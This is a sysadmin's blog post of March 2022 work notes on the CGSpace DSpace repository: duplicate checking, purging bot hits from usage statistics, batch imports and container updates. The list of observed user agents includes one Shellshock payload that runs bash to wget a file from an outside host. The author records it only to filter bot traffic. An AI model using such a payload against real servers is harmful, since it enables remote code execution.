<!DOCTYPE html>
< html lang = "en" >
< head >
< meta charset = "utf-8" >
< meta name = "viewport" content = "width=device-width, initial-scale=1, shrink-to-fit=no" >
< meta property = "og:title" content = "March, 2022" / >
< meta property = "og:description" content = "2022-03-01
Send Gaia the last batch of potential duplicates for items 701 to 980:
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
" />
< meta property = "og:type" content = "article" / >
< meta property = "og:url" content = "https://alanorth.github.io/cgspace-notes/2022-03/" / >
< meta property = "article:published_time" content = "2022-03-01T16:46:54+03:00" / >
< meta property = "article:modified_time" content = "2022-03-10T14:35:14+03:00" / >
< meta name = "twitter:card" content = "summary" / >
< meta name = "twitter:title" content = "March, 2022" / >
< meta name = "twitter:description" content = "2022-03-01
Send Gaia the last batch of potential duplicates for items 701 to 980:
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
"/>
< meta name = "generator" content = "Hugo 0.93.2" / >
< script type = "application/ld+json" >
{
"@context": "http://schema.org",
"@type": "BlogPosting",
"headline": "March, 2022",
"url": "https://alanorth.github.io/cgspace-notes/2022-03/",
"wordCount": "488",
"datePublished": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-03-10T14:35:14+03:00",
"author": {
"@type": "Person",
"name": "Alan Orth"
},
"keywords": "Notes"
}
< / script >
< link rel = "canonical" href = "https://alanorth.github.io/cgspace-notes/2022-03/" >
< title > March, 2022 | CGSpace Notes< / title >
<!-- combined, minified CSS -->
< link href = "https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel = "stylesheet" integrity = "sha256-vrgBLtwIuhC+AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin = "anonymous" >
<!-- minified Font Awesome for SVG icons -->
< script defer src = "https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity = "sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz+lcnA=" crossorigin = "anonymous" > < / script >
<!-- RSS 2.0 feed -->
< / head >
< body >
< div class = "blog-masthead" >
< div class = "container" >
< nav class = "nav blog-nav" >
< a class = "nav-link " href = "https://alanorth.github.io/cgspace-notes/" > Home< / a >
< / nav >
< / div >
< / div >
< header class = "blog-header" >
< div class = "container" >
< h1 class = "blog-title" dir = "auto" > < a href = "https://alanorth.github.io/cgspace-notes/" rel = "home" > CGSpace Notes< / a > < / h1 >
< p class = "lead blog-description" dir = "auto" > Documenting day-to-day work on the < a href = "https://cgspace.cgiar.org" > CGSpace< / a > repository.< / p >
< / div >
< / header >
< div class = "container" >
< div class = "row" >
< div class = "col-sm-8 blog-main" >
< article class = "blog-post" >
< header >
< h2 class = "blog-post-title" dir = "auto" > < a href = "https://alanorth.github.io/cgspace-notes/2022-03/" > March, 2022< / a > < / h2 >
< p class = "blog-post-meta" >
< time datetime = "2022-03-01T16:46:54+03:00" > Tue Mar 01, 2022< / time >
in
< span class = "fas fa-folder" aria-hidden = "true" > < / span > < a href = "/cgspace-notes/categories/notes/" rel = "category tag" > Notes< / a >
< / p >
< / header >
< h2 id = "2022-03-01" > 2022-03-01< / h2 >
< ul >
< li > Send Gaia the last batch of potential duplicates for items 701 to 980:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
< / span > < / span > < span style = "display:flex;" > < span > $ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p < span style = "color:#e6db74" > 'fuuu' < / span > -o /tmp/2022-03-01-tac-batch4-701-980.csv
< / span > < / span > < span style = "display:flex;" > < span > $ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
< / span > < / span > < span style = "display:flex;" > < span > $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
< / span > < / span > < / code > < / pre > < / div > < h2 id = "2022-03-04" > 2022-03-04< / h2 >
< ul >
< li > Looking over the CGSpace Solr statistics from 2022-02
< ul >
< li > I see a few new bots, though once I expanded my search for user agents with “www” in the name I found so many more!< / li >
< li > Here are some of the more prevalent or weird ones:
< ul >
< li > axios/0.21.1< / li >
< li > Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)< / li >
< li > Nutraspace/Nutch-1.2 (< a href = "http://www.nutraspace.com" > www.nutraspace.com< / a > )< / li >
< li > Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; < a href = "mailto:webmaster@moreover.com" > webmaster@moreover.com< / a > )< / li >
< li > Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com< / li >
< li > Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)< / li >
< li > Crowsnest/0.5 (+http://www.crowsnest.tv/)< / li >
< li > Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com< / li >
< li > metha/0.2.27< / li >
< li > ZaloPC-win32-24v454< / li >
< li > Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x< / li >
< li > ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)< / li >
< li > FullStoryBot/1.0 (+https://www.fullstory.com)< / li >
< li > Link Validity Check From: < a href = "http://www.usgs.gov" > http://www.usgs.gov< / a > < / li >
< li > OSPScraper (+https://www.opensyllabusproject.org)< / li >
< li > () { :;}; /bin/bash -c "wget -O /tmp/bbb < a href = "http://www.redel.net.br/1.php?id=3137382e37392e3138372e313832" > www.redel.net.br/1.php?id=3137382e37392e3138372e313832< / a > "< / li >
< / ul >
< / li >
< li > I submitted < a href = "https://github.com/atmire/COUNTER-Robots/pull/52" > a pull request to COUNTER-Robots< / a > with some of these< / li >
< / ul >
< / li >
< li > I purged a bunch of hits from the stats using the < code > check-spider-hits.sh< / code > script:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
< / span > < / span > < span style = "display:flex;" > < span > Purging 6 hits from scalaj-http in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 5 hits from lua-resty-http in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 9 hits from AHC in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 7 hits from acebookexternalhit in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1011 hits from axios\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 2216 hits from Faveeo\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1164 hits from Moreover\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 740 hits from Exploratodo\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 585 hits from GroupHigh\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 438 hits from Crowsnest\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1326 hits from nbertaupete95 in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 182 hits from metha\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 68 hits from ZaloPC-win32-24v454 in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1644 hits from Firefox\/x\.x in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 678 hits from ZoteroTranslationServer in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 27 hits from FullStoryBot in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 26 hits from Link Validity Check in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 26 hits from OSPScraper in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1 hits from 3137382e37392e3138372e313832 in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 2755 hits from Nutch-[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > < span style = "color:#960050;background-color:#1e0010" >
< / span > < / span > < / span > < span style = "display:flex;" > < span > < span style = "color:#960050;background-color:#1e0010" > < / span > Total number of bot hits purged: 12914
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project< / li >
< / ul >
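< p > The purge output above pairs each regular-expression pattern with the number of hits it matched. Below is a minimal Python sketch of that matching step, assuming each pattern is searched anywhere in the user agent string. It does not reproduce how < code > check-spider-hits.sh< / code > queries Solr; the helper name < code > count_bot_hits< / code > is hypothetical, and the last sample agent is a made-up ordinary browser added for contrast.< / p >

```python
import re
from collections import Counter

# A few patterns copied from the purge output above.
PATTERNS = [r"axios\/[0-9]", r"Faveeo\/[0-9]", r"Nutch-[0-9]", r"Firefox\/x\.x"]


def count_bot_hits(user_agents, patterns=PATTERNS):
    """Count user agents per pattern; the first matching pattern wins."""
    compiled = [(pattern, re.compile(pattern)) for pattern in patterns]
    counts = Counter()
    for agent in user_agents:
        for pattern, regex in compiled:
            if regex.search(agent):
                counts[pattern] += 1
                break
    return counts


# User agents from the list above, plus one hypothetical real browser.
SAMPLE_AGENTS = [
    "axios/0.21.1",
    "Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)",
    "Nutraspace/Nutch-1.2 (www.nutraspace.com)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x",
    "Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0",
]

counts = count_bot_hits(SAMPLE_AGENTS)
for pattern, hits in counts.items():
    print(f"{hits} hits from {pattern}")
```

< p > The literal < code > Firefox\/x\.x< / code > pattern only catches the placeholder version string, so the ordinary Firefox user agent in the sample is left alone.< / p >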
< h2 id = "2022-03-05" > 2022-03-05< / h2 >
< ul >
< li > Start AReS harvest< / li >
< / ul >
< h2 id = "2022-03-10" > 2022-03-10< / h2 >
< ul >
< li > A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701–980 in the spreadsheet)
< ul >
< li > I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:< / li >
< / ul >
< / li >
< / ul >
< pre tabindex = "0" > < code > or(
isNotNull(value.match('707')),
isNotNull(value.match('709')),
isNotNull(value.match('710')),
isNotNull(value.match('711')),
isNotNull(value.match('713')),
isNotNull(value.match('717')),
isNotNull(value.match('718')),
...
isNotNull(value.match('821'))
)
< / code > < / pre > < ul >
< li > Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ JAVA_OPTS< span style = "color:#f92672" > =< / span > < span style = "color:#e6db74" > "-Xmx1024m -Dfile.encoding=UTF-8" < / span > dspace import --add --eperson< span style = "color:#f92672" > =< / span > fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile< span style = "color:#f92672" > =< / span > ./2022-03-10-tac-batch4-701to980.map
< / span > < / span > < / code > < / pre > < / div > < h2 id = "2022-03-12" > 2022-03-12< / h2 >
< ul >
< li > Update all containers and rebuild OpenRXV on linode20:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ docker images | grep -v ^REPO | sed < span style = "color:#e6db74" > 's/ \+/:/g' < / span > | cut -d: -f1,2 | xargs -L1 docker pull
< / span > < / span > < span style = "display:flex;" > < span > $ docker-compose build
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > Then run all system updates and reboot< / li >
< li > Start a full harvest on AReS< / li >
< / ul >
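< p > The < code > docker images< / code > pipeline above drops the header row, collapses the column padding into colons, and keeps the first two fields so that each line becomes a < code > repository:tag< / code > reference for < code > docker pull< / code > . Here is a rough Python sketch of the same text processing, assuming the usual column layout of < code > docker images< / code > ; the function name < code > image_refs< / code > and the sample output (image names and IDs) are made up for illustration.< / p >

```python
def image_refs(docker_images_output):
    """Return repository:tag strings from `docker images` text output."""
    refs = []
    for line in docker_images_output.splitlines():
        # Mirror `grep -v ^REPO`: skip the header row (and any blank lines).
        if not line.strip() or line.startswith("REPO"):
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        # Mirror sed + cut: the first two columns are repository and tag.
        refs.append(f"{fields[0]}:{fields[1]}")
    return refs


# Hypothetical sample output; these image names and IDs are invented.
SAMPLE = """\
REPOSITORY   TAG       IMAGE ID       CREATED       SIZE
redis        6         0123456789ab   2 weeks ago   113MB
nginx        stable    ba9876543210   3 weeks ago   142MB
"""

for ref in image_refs(SAMPLE):
    print("docker pull", ref)
```

< p > One caveat that applies to both versions: a repository name that itself contains a colon, such as a registry with a port number, would not survive the < code > cut -d: -f1,2< / code > step, whereas splitting on whitespace as in the sketch keeps it intact.< / p >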
<!-- raw HTML omitted -->
< / article >
< / div > <!-- /.blog-main -->
< aside class = "col-sm-3 ml-auto blog-sidebar" >
< section class = "sidebar-module" >
< h4 > Recent Posts< / h4 >
< ol class = "list-unstyled" >
< li > < a href = "/cgspace-notes/2022-03/" > March, 2022< / a > < / li >
< li > < a href = "/cgspace-notes/2022-02/" > February, 2022< / a > < / li >
< li > < a href = "/cgspace-notes/2022-01/" > January, 2022< / a > < / li >
< li > < a href = "/cgspace-notes/2021-12/" > December, 2021< / a > < / li >
< li > < a href = "/cgspace-notes/2021-11/" > November, 2021< / a > < / li >
< / ol >
< / section >
< section class = "sidebar-module" >
< h4 > Links< / h4 >
< ol class = "list-unstyled" >
< li > < a href = "https://cgspace.cgiar.org" > CGSpace< / a > < / li >
< li > < a href = "https://dspacetest.cgiar.org" > DSpace Test< / a > < / li >
< li > < a href = "https://github.com/ilri/DSpace" > CGSpace @ GitHub< / a > < / li >
< / ol >
< / section >
< / aside >
< / div > <!-- /.row -->
< / div > <!-- /.container -->
< footer class = "blog-footer" >
< p dir = "auto" >
Blog template created by < a href = "https://twitter.com/mdo" > @mdo< / a > , ported to Hugo by < a href = 'https://twitter.com/mralanorth' > @mralanorth< / a > .
< / p >
< p >
< a href = "#" > Back to top< / a >
< / p >
< / footer >
< / body >
< / html >